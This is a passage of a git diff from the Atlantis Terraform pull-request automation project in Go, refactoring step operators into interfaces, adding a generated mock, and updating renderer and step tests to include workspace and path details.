+ Workspace: "workspace", + Path: "path", }, }, - "```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n\n", + "Ran Plan in dir: `path` workspace: `workspace`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n\n", }, { "single successful apply", @@ -135,30 +137,34 @@ func TestRenderProjectResults(t *testing.T) { []events.ProjectResult{ { ApplySuccess: "success", + Workspace: "workspace", + Path: "path", }, }, - "```diff\nsuccess\n```\n\n", + "Ran Apply in dir: `path` workspace: `workspace`\n```diff\nsuccess\n```\n\n", }, { "multiple successful plans", events.Plan, []events.ProjectResult{ { - Path: "path", + Workspace: "workspace", + Path: "path", PlanSuccess: &events.PlanSuccess{ TerraformOutput: "terraform-output", LockURL: "lock-url", }, }, { - Path: "path2", + Workspace: "workspace", + Path: "path2", PlanSuccess: &events.PlanSuccess{ TerraformOutput: "terraform-output2", LockURL: "lock-url2", }, }, }, - "Ran Plan in 2 directories:\n * `path`\n * `path2`\n\n## path/\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n## path2/\n```diff\nterraform-output2\n```\n\n* To **discard** this plan click [here](lock-url2).\n---\n\n", + "Ran Plan for 2 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n### 2. workspace: `workspace` path: `path2`\n```diff\nterraform-output2\n```\n\n* To **discard** this plan click [here](lock-url2).\n---\n\n", }, { "multiple successful applies", @@ -166,75 +172,87 @@ func TestRenderProjectResults(t *testing.T) { []events.ProjectResult{ { Path: "path", + Workspace: "workspace", ApplySuccess: "success", }, { Path: "path2", + Workspace: "workspace", ApplySuccess: "success2", }, }, - "Ran Apply in 2 directories:\n * `path`\n * `path2`\n\n## path/\n```diff\nsuccess\n```\n---\n## path2/\n```diff\nsuccess2\n```\n---\n\n", + "Ran Apply for 2 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nsuccess\n```\n---\n### 2. workspace: `workspace` path: `path2`\n```diff\nsuccess2\n```\n---\n\n", }, { "single errored plan", events.Plan, []events.ProjectResult{ { - Error: errors.New("error"), + Error: errors.New("error"), + Path: "path", + Workspace: "workspace", }, }, - "**Plan Error**\n```\nerror\n```\n\n\n", + "Ran Plan in dir: `path` workspace: `workspace`\n**Plan Error**\n```\nerror\n```\n\n\n", }, { "single failed plan", events.Plan, []events.ProjectResult{ { - Failure: "failure", + Path: "path", + Workspace: "workspace", + Failure: "failure", }, }, - "**Plan Failed**: failure\n\n\n", + "Ran Plan in dir: `path` workspace: `workspace`\n**Plan Failed**: failure\n\n\n", }, { "successful, failed, and errored plan", events.Plan, []events.ProjectResult{ { - Path: "path", + Workspace: "workspace", + Path: "path", PlanSuccess: &events.PlanSuccess{ TerraformOutput: "terraform-output", LockURL: "lock-url", }, }, { - Path: "path2", - Failure: "failure", + Workspace: "workspace", + Path: "path2", + Failure: "failure", }, { - Path: "path3", - Error: errors.New("error"), + Workspace: "workspace", + Path: "path3", + Error: errors.New("error"), }, }, - "Ran Plan in 3 directories:\n * `path`\n * `path2`\n * `path3`\n\n## path/\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n## path2/\n**Plan Failed**: failure\n\n---\n## path3/\n**Plan Error**\n```\nerror\n```\n\n---\n\n", + "Ran Plan for 3 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n1. workspace: `workspace` path: `path3`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n### 2. workspace: `workspace` path: `path2`\n**Plan Failed**: failure\n\n---\n### 3. workspace: `workspace` path: `path3`\n**Plan Error**\n```\nerror\n```\n\n---\n\n", }, { "successful, failed, and errored apply", events.Apply, []events.ProjectResult{ { + Workspace: "workspace", Path: "path", ApplySuccess: "success", }, { - Path: "path2", - Failure: "failure", + Workspace: "workspace", + Path: "path2", + Failure: "failure", }, { - Path: "path3", - Error: errors.New("error"), + Workspace: "workspace", + Path: "path3", + Error: errors.New("error"), }, }, - "Ran Apply in 3 directories:\n * `path`\n * `path2`\n * `path3`\n\n## path/\n```diff\nsuccess\n```\n---\n## path2/\n**Apply Failed**: failure\n\n---\n## path3/\n**Apply Error**\n```\nerror\n```\n\n---\n\n", + "Ran Apply for 3 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n1. workspace: `workspace` path: `path3`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nsuccess\n```\n---\n### 2. workspace: `workspace` path: `path2`\n**Apply Failed**: failure\n\n---\n### 3. workspace: `workspace` path: `path3`\n**Apply Error**\n```\nerror\n```\n\n---\n\n", }, } @@ -244,13 +262,14 @@ func TestRenderProjectResults(t *testing.T) { ProjectResults: c.ProjectResults, } for _, verbose := range []bool{true, false} { - t.Log("testing " + c.Description) - s := r.Render(res, c.Command, "log", verbose) - if !verbose { - Equals(t, c.Expected, s) - } else { - Equals(t, c.Expected+"
Log\n

\n\n```\nlog```\n

\n", s) - } + t.Run(c.Description, func(t *testing.T) { + s := r.Render(res, c.Command, "log", verbose) + if !verbose { + Equals(t, c.Expected, s) + } else { + Equals(t, c.Expected+"
Log\n

\n\n```\nlog```\n

\n", s) + } + }) } } } diff --git a/server/events/mocks/mock_pull_request_operator.go b/server/events/mocks/mock_pull_request_operator.go new file mode 100644 index 0000000000..443636863a --- /dev/null +++ b/server/events/mocks/mock_pull_request_operator.go @@ -0,0 +1,154 @@ +// Automatically generated by pegomock. DO NOT EDIT! +// Source: github.com/runatlantis/atlantis/server/events (interfaces: PullRequestOperator) + +package mocks + +import ( + "reflect" + + pegomock "github.com/petergtz/pegomock" + events "github.com/runatlantis/atlantis/server/events" +) + +type MockPullRequestOperator struct { + fail func(message string, callerSkip ...int) +} + +func NewMockPullRequestOperator() *MockPullRequestOperator { + return &MockPullRequestOperator{fail: pegomock.GlobalFailHandler} +} + +func (mock *MockPullRequestOperator) Autoplan(ctx *events.CommandContext) events.CommandResponse { + params := []pegomock.Param{ctx} + result := pegomock.GetGenericMockFrom(mock).Invoke("Autoplan", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()}) + var ret0 events.CommandResponse + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].(events.CommandResponse) + } + } + return ret0 +} + +func (mock *MockPullRequestOperator) PlanViaComment(ctx *events.CommandContext) events.CommandResponse { + params := []pegomock.Param{ctx} + result := pegomock.GetGenericMockFrom(mock).Invoke("PlanViaComment", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()}) + var ret0 events.CommandResponse + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].(events.CommandResponse) + } + } + return ret0 +} + +func (mock *MockPullRequestOperator) ApplyViaComment(ctx *events.CommandContext) events.CommandResponse { + params := []pegomock.Param{ctx} + result := pegomock.GetGenericMockFrom(mock).Invoke("ApplyViaComment", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()}) + var ret0 events.CommandResponse + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].(events.CommandResponse) + } + } + return ret0 +} + +func (mock *MockPullRequestOperator) VerifyWasCalledOnce() *VerifierPullRequestOperator { + return &VerifierPullRequestOperator{mock, pegomock.Times(1), nil} +} + +func (mock *MockPullRequestOperator) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierPullRequestOperator { + return &VerifierPullRequestOperator{mock, invocationCountMatcher, nil} +} + +func (mock *MockPullRequestOperator) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierPullRequestOperator { + return &VerifierPullRequestOperator{mock, invocationCountMatcher, inOrderContext} +} + +type VerifierPullRequestOperator struct { + mock *MockPullRequestOperator + invocationCountMatcher pegomock.Matcher + inOrderContext *pegomock.InOrderContext +} + +func (verifier *VerifierPullRequestOperator) Autoplan(ctx *events.CommandContext) *PullRequestOperator_Autoplan_OngoingVerification { + params := []pegomock.Param{ctx} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Autoplan", params) + return &PullRequestOperator_Autoplan_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type PullRequestOperator_Autoplan_OngoingVerification struct { + mock *MockPullRequestOperator + methodInvocations []pegomock.MethodInvocation +} + +func (c *PullRequestOperator_Autoplan_OngoingVerification) GetCapturedArguments() *events.CommandContext { + ctx := c.GetAllCapturedArguments() + return ctx[len(ctx)-1] +} + +func (c *PullRequestOperator_Autoplan_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]*events.CommandContext, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(*events.CommandContext) + } + } + return +} + +func (verifier *VerifierPullRequestOperator) PlanViaComment(ctx *events.CommandContext) *PullRequestOperator_PlanViaComment_OngoingVerification { + params := []pegomock.Param{ctx} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "PlanViaComment", params) + return &PullRequestOperator_PlanViaComment_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type PullRequestOperator_PlanViaComment_OngoingVerification struct { + mock *MockPullRequestOperator + methodInvocations []pegomock.MethodInvocation +} + +func (c *PullRequestOperator_PlanViaComment_OngoingVerification) GetCapturedArguments() *events.CommandContext { + ctx := c.GetAllCapturedArguments() + return ctx[len(ctx)-1] +} + +func (c *PullRequestOperator_PlanViaComment_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]*events.CommandContext, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(*events.CommandContext) + } + } + return +} + +func (verifier *VerifierPullRequestOperator) ApplyViaComment(ctx *events.CommandContext) *PullRequestOperator_ApplyViaComment_OngoingVerification { + params := []pegomock.Param{ctx} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ApplyViaComment", params) + return &PullRequestOperator_ApplyViaComment_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type PullRequestOperator_ApplyViaComment_OngoingVerification struct { + mock *MockPullRequestOperator + methodInvocations []pegomock.MethodInvocation +} + +func (c *PullRequestOperator_ApplyViaComment_OngoingVerification) GetCapturedArguments() *events.CommandContext { + ctx := c.GetAllCapturedArguments() + return ctx[len(ctx)-1] +} + +func (c *PullRequestOperator_ApplyViaComment_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]*events.CommandContext, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(*events.CommandContext) + } + } + return +} diff --git a/server/events/pull_request_operator.go b/server/events/pull_request_operator.go index 61218e902f..b393fb5b75 100644 --- a/server/events/pull_request_operator.go +++ b/server/events/pull_request_operator.go @@ -12,7 +12,15 @@ import ( "github.com/runatlantis/atlantis/server/logging" ) -type PullRequestOperator struct { +//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_pull_request_operator.go PullRequestOperator + +type PullRequestOperator interface { + Autoplan(ctx *CommandContext) CommandResponse + PlanViaComment(ctx *CommandContext) CommandResponse + ApplyViaComment(ctx *CommandContext) CommandResponse +} + +type DefaultPullRequestOperator struct { TerraformExecutor TerraformExec DefaultTFVersion *version.Version ParserValidator *yaml.ParserValidator @@ -26,7 +34,7 @@ type TerraformExec interface { RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) } -func (p *PullRequestOperator) Autoplan(ctx *CommandContext) CommandResponse { +func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandResponse { // check out repo to parse atlantis.yaml // this will check out the repo to a * dir repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace) @@ -99,7 +107,7 @@ func (p *PullRequestOperator) Autoplan(ctx *CommandContext) CommandResponse { return CommandResponse{ProjectResults: results} } -func (p *PullRequestOperator) PlanViaComment(ctx *CommandContext) CommandResponse { +func (p *DefaultPullRequestOperator) PlanViaComment(ctx *CommandContext) CommandResponse { repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace) if err != nil { return CommandResponse{Error: err} @@ -141,7 +149,7 @@ func (p *PullRequestOperator) PlanViaComment(ctx *CommandContext) CommandRespons } } -func (p *PullRequestOperator) ApplyViaComment(ctx *CommandContext) CommandResponse { +func (p *DefaultPullRequestOperator) ApplyViaComment(ctx *CommandContext) CommandResponse { repoDir, err := p.Workspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, ctx.Command.Workspace) if err != nil { return CommandResponse{Failure: "No workspace found. Did you run plan?"} @@ -185,7 +193,7 @@ func (p *PullRequestOperator) ApplyViaComment(ctx *CommandContext) CommandRespon // matchingProjects returns the list of projects whose WhenModified fields match // any of the modifiedFiles. -func (p *PullRequestOperator) matchingProjects(modifiedFiles []string, config valid.Spec) []valid.Project { +func (p *DefaultPullRequestOperator) matchingProjects(modifiedFiles []string, config valid.Spec) []valid.Project { //todo // match the modified files against the config // remember the modified_files paths are relative to the project paths diff --git a/server/events/pull_request_operator_test.go b/server/events/pull_request_operator_test.go index 4bbdfd14b5..79457f0dd2 100644 --- a/server/events/pull_request_operator_test.go +++ b/server/events/pull_request_operator_test.go @@ -1,199 +1 @@ package events_test - -import ( - "io/ioutil" - "path/filepath" - "testing" - - "github.com/hashicorp/go-version" - "github.com/runatlantis/atlantis/server/events" - "github.com/runatlantis/atlantis/server/events/runtime" - "github.com/runatlantis/atlantis/server/logging" - . "github.com/runatlantis/atlantis/testing" -) - -// When there is no config file, should use the defaults. -func TestBuildStage_NoConfigFile(t *testing.T) { - var defaultTFVersion *version.Version - var terraformExecutor runtime.TerraformExec - e := events.PullRequestOperator{ - DefaultTFVersion: defaultTFVersion, - TerraformExecutor: terraformExecutor, - } - - log := logging.NewNoopLogger() - repoDir := "/willnotexist" - workspace := "myworkspace" - relProjectPath := "mydir" - var extraCommentArgs []string - username := "myuser" - meta := runtime.StepMeta{ - Log: log, - Workspace: workspace, - AbsolutePath: filepath.Join(repoDir, relProjectPath), - DirRelativeToRepoRoot: relProjectPath, - TerraformVersion: defaultTFVersion, - TerraformExecutor: terraformExecutor, - ExtraCommentArgs: extraCommentArgs, - Username: username, - } - - // Test the plan stage first. - t.Run("plan stage", func(t *testing.T) { - planStage, err := e.BuildPlanStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - Ok(t, err) - Equals(t, runtime.PlanStage{ - Steps: []runtime.Step{ - &runtime.InitStep{ - Meta: meta, - }, - &runtime.PlanStep{ - Meta: meta, - }, - }, - }, planStage) - }) - - // Then the apply stage. - t.Run("apply stage", func(t *testing.T) { - applyStage, err := e.BuildApplyStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - Ok(t, err) - Equals(t, runtime.ApplyStage{ - Steps: []runtime.Step{ - &runtime.ApplyStep{ - Meta: meta, - }, - }, - }, *applyStage) - }) -} - -func TestBuildStage(t *testing.T) { - var defaultTFVersion *version.Version - var terraformExecutor runtime.TerraformExec - e := events.PullRequestOperator{ - DefaultTFVersion: defaultTFVersion, - TerraformExecutor: terraformExecutor, - } - - // Write atlantis.yaml config. - tmpDir, cleanup := TempDir(t) - defer cleanup() - err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(` -version: 2 -projects: -- dir: "." - workflow: custom -workflows: - custom: - plan: - steps: - - init: - extra_args: [arg1, arg2] - - plan - - run: echo hi - apply: - steps: - - run: prerun - - apply: - extra_args: [arg3, arg4] - - run: postrun -`), 0644) - Ok(t, err) - - repoDir := tmpDir - log := logging.NewNoopLogger() - workspace := "myworkspace" - // Our config is for '.' so there will be no config for this project. - relProjectPath := "mydir" - var extraCommentArgs []string - username := "myuser" - meta := runtime.StepMeta{ - Log: log, - Workspace: workspace, - AbsolutePath: filepath.Join(repoDir, relProjectPath), - DirRelativeToRepoRoot: relProjectPath, - TerraformVersion: defaultTFVersion, - TerraformExecutor: terraformExecutor, - ExtraCommentArgs: extraCommentArgs, - Username: username, - } - - t.Run("plan stage for project without config", func(t *testing.T) { - // This project isn't listed so it should get the defaults. - planStage, err := e.BuildPlanStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - Ok(t, err) - Equals(t, runtime.PlanStage{ - Steps: []runtime.Step{ - &runtime.InitStep{ - Meta: meta, - }, - &runtime.PlanStep{ - Meta: meta, - }, - }, - }, planStage) - }) - - t.Run("apply stage for project without config", func(t *testing.T) { - // This project isn't listed so it should get the defaults. - applyStage, err := e.BuildApplyStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - Ok(t, err) - Equals(t, runtime.ApplyStage{ - Steps: []runtime.Step{ - &runtime.ApplyStep{ - Meta: meta, - }, - }, - }, *applyStage) - }) - - // Create the meta for the custom project. - customMeta := meta - customMeta.Workspace = "default" - customMeta.DirRelativeToRepoRoot = "." - customMeta.AbsolutePath = tmpDir - - t.Run("plan stage for custom config", func(t *testing.T) { - planStage, err := e.BuildPlanStage(log, repoDir, "default", ".", extraCommentArgs, username) - Ok(t, err) - - Equals(t, runtime.PlanStage{ - Steps: []runtime.Step{ - &runtime.InitStep{ - Meta: customMeta, - ExtraArgs: []string{"arg1", "arg2"}, - }, - &runtime.PlanStep{ - Meta: customMeta, - }, - &runtime.RunStep{ - Meta: customMeta, - Commands: []string{"echo", "hi"}, - }, - }, - }, planStage) - }) - - t.Run("apply stage for custom config", func(t *testing.T) { - planStage, err := e.BuildApplyStage(log, repoDir, "default", ".", extraCommentArgs, username) - Ok(t, err) - - Equals(t, runtime.ApplyStage{ - Steps: []runtime.Step{ - &runtime.RunStep{ - Meta: customMeta, - Commands: []string{"prerun"}, - }, - &runtime.ApplyStep{ - Meta: customMeta, - ExtraArgs: []string{"arg3", "arg4"}, - }, - &runtime.RunStep{ - Meta: customMeta, - Commands: []string{"postrun"}, - }, - }, - }, *planStage) - }) -} diff --git a/server/events/runtime/apply_step_operator_test.go b/server/events/runtime/apply_step_operator_test.go index 862f5e10e5..1aad3c9e23 100644 --- a/server/events/runtime/apply_step_operator_test.go +++ b/server/events/runtime/apply_step_operator_test.go @@ -8,42 +8,35 @@ import ( "github.com/hashicorp/go-version" . "github.com/petergtz/pegomock" "github.com/runatlantis/atlantis/server/events/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/models" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform/mocks" + "github.com/runatlantis/atlantis/server/events/yaml/valid" . "github.com/runatlantis/atlantis/testing" ) func TestRun_NoDir(t *testing.T) { - s := runtime.ApplyStep{ - Meta: runtime.StepMeta{ - Workspace: "workspace", - AbsolutePath: "nonexistent/path", - DirRelativeToRepoRoot: ".", - TerraformVersion: nil, - ExtraCommentArgs: nil, - Username: "username", - }, + o := runtime.ApplyStepOperator{ + TerraformExecutor: nil, } - _, err := s.Run() + _, err := o.Run(models.ProjectCommandContext{ + RepoRelPath: ".", + Workspace: "workspace", + }, nil, "/nonexistent/path") ErrEquals(t, "no plan found at path \".\" and workspace \"workspace\"–did you run plan?", err) } func TestRun_NoPlanFile(t *testing.T) { tmpDir, cleanup := TempDir(t) defer cleanup() - - s := runtime.ApplyStep{ - Meta: runtime.StepMeta{ - Workspace: "workspace", - AbsolutePath: tmpDir, - DirRelativeToRepoRoot: ".", - TerraformVersion: nil, - ExtraCommentArgs: nil, - Username: "username", - }, + o := runtime.ApplyStepOperator{ + TerraformExecutor: nil, } - _, err := s.Run() + _, err := o.Run(models.ProjectCommandContext{ + RepoRelPath: ".", + Workspace: "workspace", + }, nil, tmpDir) ErrEquals(t, "no plan found at path \".\" and workspace \"workspace\"–did you run plan?", err) } @@ -56,24 +49,46 @@ func TestRun_Success(t *testing.T) { RegisterMockTestingT(t) terraform := mocks.NewMockClient() + o := runtime.ApplyStepOperator{ + TerraformExecutor: terraform, + } - tfVersion, _ := version.NewVersion("0.11.4") - s := runtime.ApplyStep{ - Meta: runtime.StepMeta{ - Workspace: "workspace", - AbsolutePath: tmpDir, - DirRelativeToRepoRoot: ".", - TerraformExecutor: terraform, - TerraformVersion: tfVersion, - ExtraCommentArgs: []string{"comment", "args"}, - Username: "username", - }, - ExtraArgs: []string{"extra", "args"}, + When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). + ThenReturn("output", nil) + output, err := o.Run(models.ProjectCommandContext{ + Workspace: "workspace", + RepoRelPath: ".", + CommentArgs: []string{"comment", "args"}, + }, []string{"extra", "args"}, tmpDir) + Ok(t, err) + Equals(t, "output", output) + terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, nil, "workspace") +} + +func TestRun_UsesConfiguredTFVersion(t *testing.T) { + tmpDir, cleanup := TempDir(t) + defer cleanup() + planPath := filepath.Join(tmpDir, "workspace.tfplan") + err := ioutil.WriteFile(planPath, nil, 0644) + Ok(t, err) + + RegisterMockTestingT(t) + terraform := mocks.NewMockClient() + o := runtime.ApplyStepOperator{ + TerraformExecutor: terraform, } + tfVersion, _ := version.NewVersion("0.11.0") When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). ThenReturn("output", nil) - output, err := s.Run() + output, err := o.Run(models.ProjectCommandContext{ + Workspace: "workspace", + RepoRelPath: ".", + CommentArgs: []string{"comment", "args"}, + ProjectConfig: &valid.Project{ + TerraformVersion: tfVersion, + }, + }, []string{"extra", "args"}, tmpDir) Ok(t, err) Equals(t, "output", output) terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, tfVersion, "workspace") diff --git a/server/events/runtime/init_step_operator_test.go b/server/events/runtime/init_step_operator_test.go index 8296394977..efbf4ca283 100644 --- a/server/events/runtime/init_step_operator_test.go +++ b/server/events/runtime/init_step_operator_test.go @@ -3,9 +3,10 @@ package runtime_test import ( "testing" - "github.com/hashicorp/go-version" + version "github.com/hashicorp/go-version" . "github.com/petergtz/pegomock" "github.com/runatlantis/atlantis/server/events/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/models" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform/mocks" @@ -45,15 +46,16 @@ func TestRun_UsesGetOrInitForRightVersion(t *testing.T) { logger := logging.NewNoopLogger() iso := runtime.InitStepOperator{ TerraformExecutor: terraform, + DefaultTFVersion: tfVersion, } When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). ThenReturn("output", nil) - output, err := iso.Run(runtime.ProjectCommandContext{ + + output, err := iso.Run(models.ProjectCommandContext{ Log: logger, Workspace: "workspace", - AbsPath: "/path", RepoRelPath: ".", - }, []string{"extra", "args"}) + }, []string{"extra", "args"}, "/path") Ok(t, err) // Shouldn't return output since we don't print init output to PR. Equals(t, "", output) diff --git a/server/events/runtime/plan_step_operater_test.go b/server/events/runtime/plan_step_operater_test.go index 53b45c2e64..bf80927b6d 100644 --- a/server/events/runtime/plan_step_operater_test.go +++ b/server/events/runtime/plan_step_operater_test.go @@ -1,7 +1,6 @@ package runtime_test import ( - "errors" "io/ioutil" "os" "path/filepath" @@ -9,7 +8,9 @@ import ( "github.com/hashicorp/go-version" . "github.com/petergtz/pegomock" + "github.com/pkg/errors" "github.com/runatlantis/atlantis/server/events/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/models" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform/mocks" @@ -25,23 +26,20 @@ func TestRun_NoWorkspaceIn08(t *testing.T) { tfVersion, _ := version.NewVersion("0.8") logger := logging.NewNoopLogger() workspace := "default" - s := runtime.PlanStep{ - Meta: runtime.StepMeta{ - Log: logger, - Workspace: workspace, - AbsolutePath: "/path", - DirRelativeToRepoRoot: ".", - TerraformExecutor: terraform, - TerraformVersion: tfVersion, - ExtraCommentArgs: []string{"comment", "args"}, - Username: "username", - }, - ExtraArgs: []string{"extra", "args"}, + s := runtime.PlanStepOperator{ + DefaultTFVersion: tfVersion, + TerraformExecutor: terraform, } When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). ThenReturn("output", nil) - output, err := s.Run() + output, err := s.Run(models.ProjectCommandContext{ + Log: logger, + CommentArgs: []string{"comment", "args"}, + Workspace: workspace, + RepoRelPath: ".", + User: models.User{Username: "username"}, + }, []string{"extra", "args"}, "/path") Ok(t, err) Equals(t, "output", output) @@ -61,23 +59,19 @@ func TestRun_ErrWorkspaceIn08(t *testing.T) { tfVersion, _ := version.NewVersion("0.8") logger := logging.NewNoopLogger() workspace := "notdefault" - s := runtime.PlanStep{ - Meta: runtime.StepMeta{ - Log: logger, - Workspace: workspace, - AbsolutePath: "/path", - DirRelativeToRepoRoot: ".", - TerraformExecutor: terraform, - TerraformVersion: tfVersion, - ExtraCommentArgs: []string{"comment", "args"}, - Username: "username", - }, - ExtraArgs: []string{"extra", "args"}, + s := runtime.PlanStepOperator{ + TerraformExecutor: terraform, + DefaultTFVersion: tfVersion, } When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). ThenReturn("output", nil) - _, err := s.Run() + _, err := s.Run(models.ProjectCommandContext{ + Log: logger, + Workspace: workspace, + RepoRelPath: ".", + User: models.User{Username: "username"}, + }, []string{"extra", "args"}, "/path") ErrEquals(t, "terraform version 0.8.0 does not support workspaces", err) } @@ -112,23 +106,21 @@ func TestRun_SwitchesWorkspace(t *testing.T) { tfVersion, _ := version.NewVersion(c.tfVersion) logger := logging.NewNoopLogger() - s := runtime.PlanStep{ - Meta: runtime.StepMeta{ - Log: logger, - Workspace: "workspace", - AbsolutePath: "/path", - DirRelativeToRepoRoot: ".", - TerraformExecutor: terraform, - TerraformVersion: tfVersion, - ExtraCommentArgs: []string{"comment", "args"}, - Username: "username", - }, - ExtraArgs: []string{"extra", "args"}, + + s := runtime.PlanStepOperator{ + TerraformExecutor: terraform, + DefaultTFVersion: tfVersion, } When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). ThenReturn("output", nil) - output, err := s.Run() + output, err := s.Run(models.ProjectCommandContext{ + Log: logger, + Workspace: "workspace", + RepoRelPath: ".", + User: models.User{Username: "username"}, + CommentArgs: []string{"comment", "args"}, + }, []string{"extra", "args"}, "/path") Ok(t, err) Equals(t, "output", output) @@ -170,18 +162,9 @@ func TestRun_CreatesWorkspace(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion(c.tfVersion) logger := logging.NewNoopLogger() - s := runtime.PlanStep{ - Meta: runtime.StepMeta{ - Log: logger, - Workspace: "workspace", - AbsolutePath: "/path", - DirRelativeToRepoRoot: ".", - TerraformExecutor: terraform, - TerraformVersion: tfVersion, - ExtraCommentArgs: []string{"comment", "args"}, - Username: "username", - }, - ExtraArgs: []string{"extra", "args"}, + s := runtime.PlanStepOperator{ + TerraformExecutor: terraform, + DefaultTFVersion: tfVersion, } // Ensure that we actually try to switch workspaces by making the @@ -194,7 +177,13 @@ func TestRun_CreatesWorkspace(t *testing.T) { expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/workspace.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"} When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil) - output, err := s.Run() + output, err := s.Run(models.ProjectCommandContext{ + Log: logger, + Workspace: "workspace", + RepoRelPath: ".", + User: models.User{Username: "username"}, + CommentArgs: []string{"comment", "args"}, + }, []string{"extra", "args"}, "/path") Ok(t, err) Equals(t, "output", output) @@ -212,26 +201,22 @@ func TestRun_NoWorkspaceSwitchIfNotNecessary(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion("0.10.0") logger := logging.NewNoopLogger() - s := runtime.PlanStep{ - Meta: runtime.StepMeta{ - Log: logger, - Workspace: "workspace", - AbsolutePath: "/path", - DirRelativeToRepoRoot: ".", - TerraformExecutor: terraform, - TerraformVersion: tfVersion, - ExtraCommentArgs: []string{"comment", "args"}, - Username: "username", - }, - ExtraArgs: []string{"extra", "args"}, + s := runtime.PlanStepOperator{ + 